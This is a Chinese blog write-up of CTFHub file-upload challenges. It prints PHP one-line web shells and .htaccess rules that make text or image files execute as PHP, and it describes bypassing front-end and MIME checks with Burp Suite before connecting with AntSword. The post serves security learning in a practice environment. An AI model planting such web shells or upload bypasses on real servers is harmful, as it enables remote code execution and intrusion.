ctfhub文件上传

最新推荐文章于 2024-05-13 16:10:13 发布
最新推荐文章于 2024-05-13 16:10:13 发布
阅读量89 收藏
点赞数
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leriger/article/details/134043173
版权

一、无验证

需要用到的:

  (1)一句话木马

  (2)中国蚁剑

由题意得改题目不会对我们上传的文件进行检测过滤,所以写一个一句话木马上传

<?php eval($_POST['password']);?>

 

上传成功后,用蚁建和网站进行连接 

进入文件目录,找到flag_545955.php文件,打开得到flag。

二、前端验证

需要用到的:

  (1)一句话木马

  (2)中国蚁剑 

       (3)burpsuite抓包改包

打开源码

function checkfilesuffix()
{
    var file=document.getElementsByName('file')[0]['value'];
    if(file==""||file==null)
    {
        alert("请添加上传文件");
        return false;
    }
    else
    {
        var whitelist=new Array(".jpg",".png",".gif");
        var file_suffix=file.substring(file.lastIndexOf("."));
        if(whitelist.indexOf(file_suffix) == -1)
        {
            alert("该文件不允许上传");
            return false;
        }
    }
}

 它只允许 jpg、png、gif 格式上传

思路:将一句话木马的后缀改为这三种格式的任意一种,然后利用burp suite抓包,将后缀去掉,文件上传成功,再利用蚁剑连接

三、.htaccess

htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

许多服务器还允许开发人员在各个目录中创建特殊的配置文件,以便覆盖或添加一个或多个全局设置。例如,Apache 服务器将从一个名为(.htaccess如果存在)的文件中加载特定于目录的配置。Web 服务器使用这些类型的配置文件,但通常不允许您使用HTTP请求访问它们。但是,您可能偶尔会发现无法阻止您上传自己的恶意配置文件的服务器在,这种情况下.即使您需要的文件扩展名被列入黑名单,您也可以欺骗服务器将任意自定义文件扩展名映射到可执行的MIME 类型。
如果当你上传文件的时候发现你的脚本文件被阻止上传,你可以尝试上传.htaccess文件。在.htaccess文件里面将你的文件扩展名映射到可执行MIME类型。只需要添加一句话:

AddType application/x-httpd-php .html(则html文件也能执行.php文件)
AddType application/x-httpd-php .txt(则普通的文本文档也能执行.php文件)

.htaccess 文件上传漏洞原理:

  一般.htaccess可以用来留后门和针对黑名单绕过

  创建一个txt写入

   AddType application/x-httpd-php .png 

  打开另存为

  保存类型为所有文件

  让 png 解析为 php 

  还可以把png改成其他图片格式~例如jpeg、gif等等...

  另外,还有一个知识~(此题没用到这部分知识)

  可以在.htaccess 加入php解析规则

  类似于把文件名包含1的解析成php

  <FilesMatch "1">

  SetHandler application/x-httpd-php

  </FilesMatch>

  1.png  就会以php执行

当上传php文件,加上后缀都不成功时可以尝试该方法 

题解:新建txt文件,写入以下代码

#将txt文件解析为PHP文件执行
AddType application/x-httpd-php .txt

将该.txt文件更改后缀为.htaccess,上传成功

再新建一个shell.txt,写入PHP代码

<?php 
echo "PHP Loaded";
eval(@$_POST['a']);
?>

上传成功,蚁剑建立连接

四、MIME绕过

MIME多用途互联网邮件扩展类型。它是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式每个MIME类型由两部分组成,前面是数据的大类别,例如声音 audio、图像 Image等,后面定义具体的种类。

  常见的MME类型,例如:

  超文本标记语言文本 .html,html text/htm

  普通文本   .txt text/plain

  RTF文本. rtf application/rtf

  GIF图形 .gif image/gif

  JPEG图形 . jpg image/jpeg

MIME类型校验就是我们在上传文件到服务端的时候,服务端会对客户端也就是我们上传的文件的Content-Type类型进行检测,如果是白名单所允许的,则可以正常上传,否则上传失败。

题解:新建一个一句话木马的php文件,上传时用burpsuite抓包,将Content-Type为image/jpeg,上传成功,蚁剑连接

leriger
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
3.18号日报,ctfhub中web,文件上传漏洞题目解法
03-18
文件上传漏洞
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 ...url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
04-22
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期 脚本及工具
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
在做题中学习(54):点名
yiren_liusong的博客
05-10 388
解法三:位运算 搞一个和原数组大小相同的数组,和原数组进行异或,最后看看剩下是哪一个数即可。O(n)空间+O(n)时间。解法二:哈希表 把原数组丢入哈希表,遍历哈希表,看看哪个数值为0即可。O(n)空间+O(n)时间。解法四:高斯求和 求和公式算出结果后,依次 - 数组中的元素,被减数剩下的就是结果。处理边界情况:如果数组缺的正好是最后一个位置,那么需要特殊处理。可以看出,数组和下标的对应关系,解法一:暴力枚举 O(n);对应的下标,就是缺的那个数字。
信息系统项目管理师(高项)--学习笔记【第3章:信息系统治理】
qq_28288835的博客
05-08 736
目录第3章 信息系统治理3.1 IT治理3.1.1IT治理基础3.1.2IT治理体系3.1.3IT治理任务3.1.4IT治理方法与标准3.2 IT审计3.2.1IT审计基础3.2.2IT审计方法与技术3.2.3审计流程3.2.4审计内容 第3章 信息系统治理 3.1 IT治理 3.1.1IT治理基础 作用:以组织战略为导向、实现IT与业务匹配为重心、以价值交付为成果、以绩效管理为控制手段 IT治理目标:与业务目标一致、有效利用信息与数据资源、风险管理 IT治理管理层次:最高管理层、 执行管理层、业务与服务
【android systrace学习
q_2474932226的博客
05-09 353
这里面基本涵盖了systrace的基础知识。
【HCIP学习】BGP对等体组、聚合、路由反射器、联盟、团体属性
m0_74355247的博客
05-12 691
(1)AS_PATH:解决AS之间的环路问题(2)IBGP的水平分割:解决一个AS内部IBGP邻居之间环路问题(3)当一个反射群中存在多个反射器时,通过Cluster-list防环,(BGP反射器)(4)在多个反射群之间,通过originator_ID防环,(BGP反射器)9、注意事项反射路由无法使用策略去更改路由属性10、实验配置[R2-bgp]peer 3.3.3.3 reflect-client //在反射器上配置其反射客户机。
【SpringBoot】解锁后端测试新境界:学习Mockito与MockMvc的单元测试魔法
墩墩分墩
05-08 441
**所谓的mock就是创建一个`类的虚拟对象`,在测试环境中,`用来替换掉真实的对象`,以达到2个目的:** - 验证这个对象的某些方法的调用情况,调用了多少次,参数是什么等等 - 指定这个对象的某些方法的行为,返回特定的值,或者是执行特定的动作
RustGUI学习(iced)之小部件(十):如何使用tooltip部件来制作文字提示?
用沸腾的热血,支付我们的人生吧!
05-10 207
本专栏是学习Rust的GUI库iced的合集,将介绍iced涉及的各个小部件分别介绍,最后会汇总为一个总的程序。iced是RustGUI中比较强大的一个,目前处于发展中(即版本可能会改变),本专栏基于版本0.12.1.
设计模式学习1
Faya__的博客
05-09 899
最后给大家推荐一个LinuxC/C++高级架构系统教程的学习资源与课程,可以帮助你有方向、更细致地学习C/C++后端开发,具体内容请见 https://xxetb.xetslk.com/s/1o04uB。定义对象间的一种一对多(变化)的依赖关系,以便当一个对象(Subject)的状态发生改变时,所有依赖于它的对象都得到通知并自动更新。设计模式是指在软件开发过程中,经过验证的,用于解决特定环境下,重复出现的,特定问题的解决方案。定义一个操作中的算法的骨架 ,而将一些步骤延迟到子类中。变化点:算法的需要变化。
Java入门基础学习笔记15——强制类型转换
CCH2024的专栏
05-10 249
Java入门基础学习笔记
【其他学习参考文档记录】
最新发布
米老鼠kkk的博客
05-13 356
添加链接描述
go学习笔记
多思考思考
05-08 354
步骤 4:tar -zxvf go1.9.2.linux-amd64.tar.gz [解压后,就可以看到一个 go 目录]步骤 2: 将 go1.9.2.linux-amd64.tar.gz 拷贝到 /opt 下。32 位系统:go1.9.2.linux-386.tar.gz。Go 语言的官网为:golang.org , 因为各种原因,可能无法访问。SDK 安装目录建议: linux 放在 /opt 目录下。1.3,Linux 下搭建 Go 开发环境-安装和配置 SDK。步骤 5: cd go/bin。
牛客网Java实战项目--仿牛客网社区的学习笔记
qq_41523340的博客
05-11 978
这里写目录标题一级目录二级目录三级目录 一级目录 二级目录 三级目录
4.5网安学习第四阶段第五周回顾(个人学习记录使用)
lovely2610的博客
05-11 927
活动目录(Active Directory)是面向Windows Standard Server、Windows Enterprise Server以及 Windows Datacenter Server的目录服务。Active Directory不能运行在Windows Web Server上,但是可以通过它对运行Windows Web Server的计算机进行管理。Active Directory存储了有关网络对象的信息,并且让管理员和用户能够轻松地查找和使用这些信息。
Tcl学习笔记(四)——流程控制、过程、命名空间、访问文件
STATEABC的博客
05-08 651
后跟两个参数:表达式、待执行的Tcl脚本。if命令中的每一个左大括号都必须与它前一个字符同行。,使用时与if中第二个参数的右大括号放在同一行。
23种设计模式学习导航
IT深耕十余载,大道之简
05-11 1034
23种设计模式在Java中是一种重要的软件开发原则,旨在提高代码的可维护性、可扩展性和重用性。这些设计模式分为创建型模式、结构型模式和行为型模式三类。:将一个复杂对象的构建与它的表示分离,使得同样的构建过程可以创建不同的表示。:用原型实例指定创建对象的种类,并且通过拷贝这些原型创建新的对象。:定义一个用于创建对象的接口,让子类决定实例化哪一个类。:确保一个类只有一个实例,并提供一个全局访问点。:复用对象以减少创建和销毁对象的开销。三、行为型模式(11种)一、创建型模式(5种)二、结构型模式(7种)
CTFHUB文件上传
09-06
文件上传是一种将文件从客户端上传到服务器的过程。在CTFHUB中,文件上传可以用来绕过安全限制并获取敏感信息。有几种常见的方法可以进行文件上传,包括.htaccess上传、.php木马文件上传和文件名后缀双写绕过。 在.htaccess上传方法中,首先上传.htaccess文件,然后上传的文件都会解析为php文件。可以将一个.php文件改成.png文件上传,并返回上传成功的路径。可以使用蚁剑等工具连接服务器,并获取flag。这种方法可以绕过MIME类型限制。 另一种方法是直接上传.php木马文件,由于没有任何限制,可以直接上传成功,并显示上传文件的相对路径。同样可以使用蚁剑等工具连接服务器,***例如将上传文件的后缀改为phphpp,上传成功后可以返回路径。如果发现文件后缀是hpp,则需要重新更改后缀再次上传。同样可以使用蚁剑等工具连接服务器,并获取flag。这种方法可以绕过后缀限制。 总结来说,CTFHUB文件上传可以***连接服务器,并获得flag。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTFHub_文件上传](https://blog.csdn.net/weixin_47443077/article/details/119453421)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值